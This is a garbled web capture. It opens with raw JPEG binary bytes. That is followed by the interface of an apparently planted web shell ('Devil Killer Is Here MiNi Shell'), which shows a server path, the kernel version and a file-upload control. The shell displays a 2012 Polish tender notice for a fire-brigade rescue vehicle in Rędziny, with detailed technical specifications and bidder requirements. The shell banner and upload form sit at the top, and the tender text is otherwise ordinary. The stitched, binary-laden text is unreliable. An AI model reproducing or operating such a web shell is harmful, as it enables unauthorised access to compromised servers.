JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/320196-N-2012.html

<p class="kh_header"><b>Rędziny: ZAMAWIAJĄCYM  NINIEJSZY PRZEDMIOT ZAMOWIENIA JEST OCHOTNICZA STRAZ POŻARNA W KOŚCIELCU z/s KOŚCIELEC ul. WOLNOŚCI 98.
NAZWA ZADANIA:
DOSTAWA  FABRYCZNIE  NOWEGO ŚREDNIEGO SAMOCHODU SPECJALNEGO POŻARNICZEGO, RATOWNICZO-GAŚNICZEGO  Z NAPĘDEM 4x4 
Typ GBA 2,5/16 DLA OSP  KOŚCIELEC GMINA RĘDZINY</b><br>
<b>Numer ogłoszenia: 320196 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Wolności 87, 42-242 Rędziny, woj. śląskie, tel. 034 3279014, faks 034 3279085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.redziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAMAWIAJĄCYM  NINIEJSZY PRZEDMIOT ZAMOWIENIA JEST OCHOTNICZA STRAZ POŻARNA W KOŚCIELCU z/s KOŚCIELEC ul. WOLNOŚCI 98.
NAZWA ZADANIA:
DOSTAWA  FABRYCZNIE  NOWEGO ŚREDNIEGO SAMOCHODU SPECJALNEGO POŻARNICZEGO, RATOWNICZO-GAŚNICZEGO  Z NAPĘDEM 4x4 
Typ GBA 2,5/16 DLA OSP  KOŚCIELEC GMINA RĘDZINY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA  FABRYCZNIE  NOWEGO ŚREDNIEGO SAMOCHODU SPECJALNEGO POŻARNICZEGO, RATOWNICZO-GAŚNICZEGO  Z NAPĘDEM 4x4 
Typ GBA 2,5.16 DLA OSP  KOŚCIELEC GMINA RĘDZINY 
 Szczegółowy zakres dostawy -  wymagania techniczne samochodu

Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą -Prawo o ruchu drogowym- z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych.
Pojazd powinien spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2
Pojazd powinien spełniać -Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania w jednostkach ochrony przeciwpożarowej-Rozporządzenie Ministra Spraw Wewnętrznych i Administracji -Dz.U. Nr 143 poz. 1002 z 2007r , i  Rozporządzenie  zmieniające-Dz.U. Nr 85 poz 553 z 2010r
Samochód musi posiadać świadectwo dopuszczenia wyrobu, do stosowania w jednostkach ochrony przeciwpożarowej wydany przez polską jednostkę certyfikującą.  Świadectwo dopuszczenia wymagane najpóźniej podczas odbioru samochodu. 
Samochód musi posiadać aktualne świadectwo homologacji typu  podwozia .
Dopuszczalna masa całkowita samochodu gotowego do  akcji ratowniczo-gaśniczej -pojazd z załogą ,pełnymi zbiornikami, zabudową i wyposażeniem-  nie może przekroczyć:   14 000kg
Maksymalna zewnętrzna obrysowa średnica zawracania - maks. 18m  
Samochód wyposażony w silnik wysokoprężny o mocy min.  280 KM  
Należy podać rzeczywiste parametry  w odniesieniu do wymagań minimalnych   
Samochód fabrycznie nowy, rok produkcji 2012.  Podać markę, typ i model
Samochód wyposażony w podwozie drogowe  w układzie napędowym:
 4x4 -uterenowiony z :
  -z przekładnią rozdzielczą z możliwością wyboru przełożeń
     szosowych i terenowych 
  -blokadą mechanizmu różnicowego tylnego mostu
  -z blokadą mechanizmu różnicowego przedniego mostu 
  -z blokadą mechanizmu międzyosiowego
  - na osi przedniej koła pojedyncze , na osi tylnej  koła   podwójne.
-dopuszcza się możliwość odłączania napędu  osi przedniej
Samochód  wyposażony w:
-system  -ABS- z możliwością odłączenia podczas jazdy w  terenie i  immobilizer
Samochód wyposażony w silnik o zapłonie samoczynnym spełniający  normę emisji spalin- Euro 5.   
Silnik wyposażony w hamulec silnikowy.     
Zawieszenie osi przedniej: mechaniczne ,resory paraboliczne, amortyzatory teleskopowe,   stabilizator  przechyłów. 
Zawieszenie osi  tylnej: mechaniczne ,resory  paraboliczne, amortyzatory teleskopowe,   stabilizator  przechyłów.
Dopuszcza się  tylne zawieszenie-pneumatyczne.
Kabina  fabrycznie jednomodułowa czterodrzwiowa, zapewniająca dostęp do silnika,  w układzie miejsc 1+1+4   -siedzenia przodem  do kierunku jazdy,
Kabina wyposażona w :
-klimatyzację
- indywidualne oświetlenie  do czytania mapy dla pozycji dowódcy
- niezależny układ ogrzewania , umożliwiający ogrzewanie kabiny przy wyłączonym silniku
-reflektor pogorzeliskowy na zewnątrz  kabiny z gniazdem  elektrycznym z prawej strony
-poręcz do trzymania w tylnej części kabiny
-zewnętrzną osłonę przeciwsłoneczną z przodu  dachu kabiny
-elektrycznie sterowane szyby po stronie kierowcy i dowódcy
-elektrycznie sterowane lusterka po stronie kierowcy i dowódcy
-lusterka zewnętrzne, elektrycznie podgrzewane -główne i szerokokątne
-lusterko rampowe-krawężnikowe  z prawej strony
-lusterko rampowe-dojazdowe, przednie 
-wywietrznik dachowy
-lampy przeciwmgielne z przodu pojazdu.
Kabina wydłużona wyposażona dodatkowo  w  uchwyty na 4 aparaty  oddechowe, umieszczone w oparciach tylnych siedzeń.
-odblokowanie każdego aparatu indywidualnie
 -dźwignia odblokowująca o konstrukcji uniemożliwiającej przypadkowe odblokowanie np. w czasie hamowania pojazdu
-uchwyty na aparaty powietrzne nie powinny ograniczać  przestrzeni załogi
-schowek pod siedzeniami w tylnej części kabiny
-dopuszcza się  tylne zawieszenie pneumatyczne                                                
Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa. Siedzenia pokryte materiałem  łatwozmywalnym, odpornym na  ścieranie. Fotele wyposażone w zagłówki. Fotel dla kierowcy z regulacją wysokości, odległości  i pochylenia oparcia.  
W kabinie kierowcy  zamontowane następujące urządzenia:
- radiotelefon samochodowy o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA ,min 125 kanałów, wyświetlacz alfanumeryczny min 14 znaków. Obrotowy potencjometr siły głosu.
-radio z odtwarzaczem CD
-podest do ładowarek radiostacji przenośnych i latarek z wyłącznikiem.
Dodatkowe urządzenia  zamontowane w kabinie:
- sygnalizacja otwarcia żaluzji skrytek i podestów
- sygnalizacja informująca o wysunięciu masztu
-sygnalizacja załączonego gniazda ładowania
- główny wyłącznik oświetlenia skrytek,
- sterowanie zraszaczami  
-sterowanie niezależnym ogrzewaniem kabiny i przedziału  pracy autopompy
-kontrolka włączenia autopompy
-wskaźnik poziomu wody w zbiorniku,
-wskaźnik poziomu środka pianotwórczego w zbiorniku
-wskaźnik  niskiego  ciśnienia
-wskaźnik  wysokiego  ciśnienia
Pojazd  wyposażony w urządzenie sygnalizacyjno- ostrzegawcze akustyczne i świetlne, pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych. 
Lampa zespolona z napisem STRAŻ z lampami  LED umieszczona na dachu kabiny i jedna lampa niebieska  LED, umieszczona na ścianie tylnej pojazdu lub na tylnej części dachu  pojazdu.
Lampa zespolona i pojedyncza -z  zabezpieczeniem ochronnym
-dodatkowe 2 lampy sygnalizacyjne niebieskie  LED  z przodu pojazdu.
-oraz fala świetlna LED umieszczona na tylnej ścianie nadwozia.
Instalacja elektryczna  wyposażona w główny wyłącznik prądu.
Pojazd  wyposażony w integralny układ prostowniczy do ładowania akumulatorów  pojazdu  z zewnętrznego źródła ~230V, z gniazdem przyłączeniowym,   umieszczonym po lewej stronie .Złącze musi być samo rozłączalne w momencie rozruchu silnika. W kabinie kierowcy sygnalizacja podłączenia instalacji do zewnętrznego źródła. 
Pojazd  wyposażony w zewnętrzne szybkozłącze do uzupełniania powietrza w układzie pneumatycznym z sieci  stacjonarnej.
Pojazd  wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego-     jako sygnalizację świetlną dopuszcza się światło cofania.
Pojazd  wyposażony w sygnał pneumatyczny, włączany dodatkowym włącznikiem z miejsca dostępnego dla kierowcy i dowódcy.
Wylot spalin skierowany na lewą stronę.
Pojazd  wyposażony w zaczep holowniczy uniwersalny do holowania przyczepy o DMC zgodnie z homologacją podwozia wraz z elektrycznym i pneumatycznym gniazdem przyłączeniowym.
Ogumienie uniwersalne, szosowo-terenowe z bieżnikiem dostosowanym do różnych warunków atmosferycznych. 
Pełnowymiarowe koło zapasowe- na wyposażeniu pojazdu 
Dopuszcza się brak stałego zamocowania w pojeździe.   
Kolory samochodu:
- elementy podwozia, rama - w kolorze czarnym,
- błotniki i zderzaki - w kolorze białym,
- żaluzje skrytek - w kolorze naturalnym aluminium
- kabina, zabudowa- w kolorze czerwonym RAL 3000.
Maksymalna wysokość całkowita pojazdu-3200mm
Zabudowa nadwozia wykonana z materiałów odpornych na korozję. 
Wewnętrzne poszycia skrytek wykonane  z anodowanej blachy aluminiowej.
Po trzy skrytki na boku pojazdu  pomiędzy kabiną a zabudową wykonana osłona ochronno-maskująca
Wymagane otwierane lub wysuwne podesty pod wszystkimi schowkami 
bocznymi zabudowy, które  umożliwią   łatwy dostęp do sprzętu. 
Musi być zainstalowany podest otwierany nad kołami tylnymi po obu stronach zabudowy. 
Otwarcie lub wysunięcie podestu, musi być sygnalizowane w kabinie kierowcy. 
Otwierane lub wysuwne podesty poza obrys pojazdu, muszą  posiadać oznakowanie ostrzegawcze
Skrytki na sprzęt i przedział autopompy wysokociśnieniowej  wyposażone w oświetlenie , podwójne listwy- LED, umieszczone pionowo po obu stronach schowka,  włączane automatycznie po otwarciu  drzwi-żaluzji skrytki. W kabinie zamontowana sygnalizacja otwarcia skrytek.
Główny wyłącznik oświetlenia skrytek, zainstalowany w kabinie kierowcy.
Skrytki  otwierane  przez  podesty -  wyposażone w oświetlenie ,  listwy- LED włączane automatycznie po otwarciu  podestu. W kabinie zamontowana sygnalizacja otwarcia skrytek.
Pojazd posiada oświetlenie pola pracy wokół samochodu . Pojazd  posiada oświetlenie powierzchni dachu.
Oświetlenia włączane z przedziału autopompy.
Szuflady i wysuwane tace  automatycznie ,blokują się w pozycji wsuniętej   i 
całkowicie wysuniętej  i posiadają zabezpieczenie  przed całkowitym wyciągnięciem
Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu, posiadają  oznakowanie ostrzegawcze.
Półki sprzętowe wykonane z aluminium, w systemie z możliwością regulacji położenia -ustawienia- wysokości półek-w zależności od potrzeb.
Schowki wyposażone w regały  wysuwne lub obrotowe na urządzenie ratownicze, agregat prądotwórczy
-Regał obrotowy -wyposażony w zestaw sprzętu m.in :
-1szt-łom zwykły, 1szt-łomo-wyciągacz , po 1szt-młotek 2 kg i 4 kg, 
-1szt-siekiera ,  1szt-nożyce do drutu.
Skrytki na sprzęt i wyposażenie zamykane żaluzjami aluminiowymi .Drzwi żaluzjowe wyposażone w zamki, jeden klucz pasuje do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed otwarciem żaluzji.-typu rurkowego.
Dach zabudowy  wykonany w formie podestu roboczego w wykonaniu antypoślizgowym .Balustrada ochronna boczna -dachu wykonana jako jednolita nierozłączna część z nadbudową pożarniczą lub  barierka rurowa  , o wys. min 200 mm.
Na dachu pojazdu zamontowana zamykana skrzynia aluminiowa na drobny sprzęt o wymiarach w przybliżeniu 1400x460x270 mm oraz  drabina dwuprzęsłowa wysuwna z podporami, z uchwytami z rolkami  na drabinę wysuwną  ,uchwyty na węże ssawne, bosak, mostki przejazdowe, tłumice itp.
Pojazd  posiada  drabinkę do wejścia na dach z tyłu samochodu ,wykonana z materiałów nierdzewnych,   umieszczoną po prawej stronie .W górnej części drabinki zamontowane poręcze ułatwiające wchodzenie 
Powierzchnie platform, podestów roboczych i podłogi  kabiny w wykonaniu antypoślizgowym
Zbiornik wody o pojemności   2,5 m3, wykonany  z  materiałów kompozytowych. Tolerancja pojemności ?1%.          
Zbiornik  wyposażony w oprzyrządowanie umożliwiające jego bezpieczną  eksploatację, z układem  zabezpieczającym przed swobodnym wypływem wody  w czasie  jazdy. Zbiornik  wyposażony w  falochrony i posiada właz rewizyjny. Zbiornik wody wyposażony w nasadę 75
Wlot do napełniania z hydrantu wyposażony w zawór odcinający oraz sito.
Zbiornik wyposażony  w urządzenie przelewowe zabezpieczające przed uszkodzeniem podczas napełniania.
-montaż  automatycznego zaworu napełniania hydrantowego zabezpieczającego przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną.
Zbiornik środka pianotwórczego, wykonany z materiałów kompozytowych, odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów o pojemności 10% pojemności zbiornika wodnego. 
Tolerancja pojemności ?1%.  Napełnianie zbiornika środkiem pianotwórczym,  możliwe z poziomu terenu i z dachu pojazdu.
Układ wodno-pianowy  wyposażony w ręczny lub automatyczny  dozownik środka pianotwórczego dostosowany do wydajności autopompy, zapewniający uzyskiwanie co najmniej  stężeń 3% i 6% -tolerancja +0,5% w całym zakresie pracy.   
Autopompa  zlokalizowana z tyłu pojazdu w obudowanym przedziale, zamykanym drzwiami żaluzjowymi .   
Autopompa dwuzakresowa ze stopniem  wysokiego ciśnienia
-wydajność , min.2000l/min, przy ciśnieniu  8 bar i głębokości ssania 1,5m,
-wydajność  stopnia wysokiego ciśnienia, min. 250 l/min  przy ciśnieniu  40 bar
Autopompa  umożliwia podanie wody i wodnego roztworu środka pianotwórczego do minimum:
- dwóch nasad tłocznych 75 zlokalizowanych z tyłu pojazdu, po bokach.
- wysokociśnieniowej linii szybkiego natarcia,
- działka wodno - pianowego.
- zraszaczy                                  
Autopompa  umożliwia podanie wody do zbiornika samochodu.
Autopompa  wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody:  - z głębokości 1,5 m w czasie do 30 sek. z głębokości 7,5 m w czasie do 60 sek.
Autopompa  wyposażona w  układ utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy.
Na wlocie ssawnym autopompy ,  zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i ze zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.
W przedziale autopompy  znajdują się co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy:
- manowakuometr,
- manometr niskiego ciśnienia,
- manometr wysokiego ciśnienia 
- wskaźnik poziomu wody w zbiorniku samochodu,
- wskaźnik poziomu środka pianotwórczego w zbiorniku,
- regulator prędkości obrotowej silnika pojazdu,
- miernik prędkości obrotowej wału pompy
- wyłącznik silnika pojazdu,
- kontrolka  ciśnienia oleju i   temperatury cieczy chłodzącej silnik
- kontrolka włączenia autopompy, 
- licznik motogodzin-pracy autopompy
Ponadto musi być zamontowane:
- sterowanie automatycznym  układem utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy
- sterownie automatycznym zaworem napełniania hydrantowego  zabezpieczającym przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną
- sterowanie ręcznym lub automatycznym  układem dozowania środka pianotwórczego  w całym zakresie pracy autopompy 
- schemat układu wodno-pianowego.
W przedziale pracy  autopompy, muszą być  zamontowane włączniki do uruchamiania silnika pojazdu i załączenia autopompy.
Włączniki muszą  być aktywne  przy neutralnej pozycji skrzyni biegów i załączonym ręcznym hamulcu postojowym.
Przedział pracy autopompy  wyposażony w dodatkowy zewnętrzny głośnik z mikrofonem, połączony z radiotelefonem samochodowym.
Przedział pracy autopompy  wyposażony w system ogrzewania  działający niezależnie od pracy silnika. Montaż sterowania ogrzewaniem, z kabiny kierowcy.
Wszystkie elementy układu wodno-pianowego , odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów.
Konstrukcja układu wodno-pianowego  umożliwia jego całkowite odwodnienie.
Działko wodno-pianowe o regulowanej wydajności, umieszczone na dachu pojazdu z nakładką do piany . Wydajność działka  od 800 do 1600 l /min,  przy podstawie działka  zamontowany zawór odcinający. Dopuszcza się zastosowanie  zaworu odcinającego  ze sterowaniem elektryczno-pneumatycznym 
Samochód  wyposażony w wysokociśnieniową  linię szybkiego natarcia o długości węża min. 60 m, umieszczoną na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności, umożliwiającą podawanie zwartego i  rozproszonego strumienia wody oraz piany.
Linia szybkiego natarcia  umożliwia podawanie wody lub piany z prądownicy bez względu na stopień rozwinięcia węża.
Zwijadło  wyposażone w  napęd elektryczny i ręczny.
Instalacja układu zraszaczy zasilanych od autopompy- min 4 dysze do podawania wody w czasie jazdy
-dwa zraszacze zamontowane przed przednią osią
-dwa zraszacze zamontowane po bokach pojazdu
Instalacja powinna być wyposażona w zawory odcinające: jeden dla zraszaczy przednich, drugi dla zraszaczy bocznych .Montaż sterowania zraszaczami z kabiny kierowcy.
Pojazd  wyposażony w wysuwany maszt oświetleniowy z  najaśnicami o mocy 2000 W :  2x1000W .
- wysokość rozłożonego masztu, mierzona od podłoża do oprawy reflektorów- minimum  5 metrów.
- obrót i pochył reflektorów, o kąt co najmniej od 0o ÷ 135o - w obie strony
- sterowanie masztem odbywa się z poziomu ziemi.  
- stopień ochrony minimum IP55 
- złożenie masztu następuje, bez konieczności ręcznego wspomagania 
- zamontowana automatyczna funkcja złożenia masztu
- w kabinie  znajduje się sygnalizacja informująca o wysunięciu masztu 
- oprócz ręcznego, wymagane także bezprzewodowe sterowanie masztem -pilotem obrotem i pochyłem reflektorów  oraz załączeniem oświetlenia, dla każdego reflektora osobno  -zasięg min 20m.
Na pojeździe   zapewnione miejsce na przewożenie sprzętu zgodnie z   Wymaganiami dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla Ochotniczych Straży Pożarnych - Edycja druga - marzec 2006
Szczegóły dotyczące rozmieszczenia sprzętu do uzgodnienia z użytkownikiem na etapie realizacji zamówienia.
Samochód należy doposażyć w:
- z przodu pojazdu montaż wyciągarki  elektrycznej o sile uciągu minimum -7ton
- Zabezpieczenie poduszki kierowcy , AirBag I
W samochodzie  należy zamontować sprzęt należący do INWESTORA składający się z:
1.Nożyce S311
2.Zestaw łańcuchów KSV 8
3.Para węży przedłużających 10 m
4.Rozpieracz ramieniowy R422
5.Wspornik LRS 120
Dostarczony sprzęt hydrauliczny musi być kompatybilny z pozostałym sprzętem firmy Lukas posiadanym przez Zamawiającego.
Wykonanie napisów na drzwiach kabiny kierowcy -OSP KSRG KOŚCIELEC  359s93
Gwarancja: 
Na podwozie samochodu min. 36 miesięcy 
Na nadwozie pożarnicze- min. 36 miesięcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający  żąda  wniesienia  wadium.
2.Dostawca zobowiązany jest wnieść  wadium w  wys.  5.000,00 zł
   (słownie: pięć  tysięcy złotych) .
3.Dostawca  obowiązany  jest wnieść wadium przed upływem terminu składania ofert - tj w  terminie  do dnia 7 września 2012 r do godz. 9:oo w skeretariacie Urzędu Gminy Rędziny.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Stwierdzenie spełnienia warunku:  SPEŁNIA  -  NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Stwierdzenie spełnienia warunku:  SPEŁNIA  -  NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

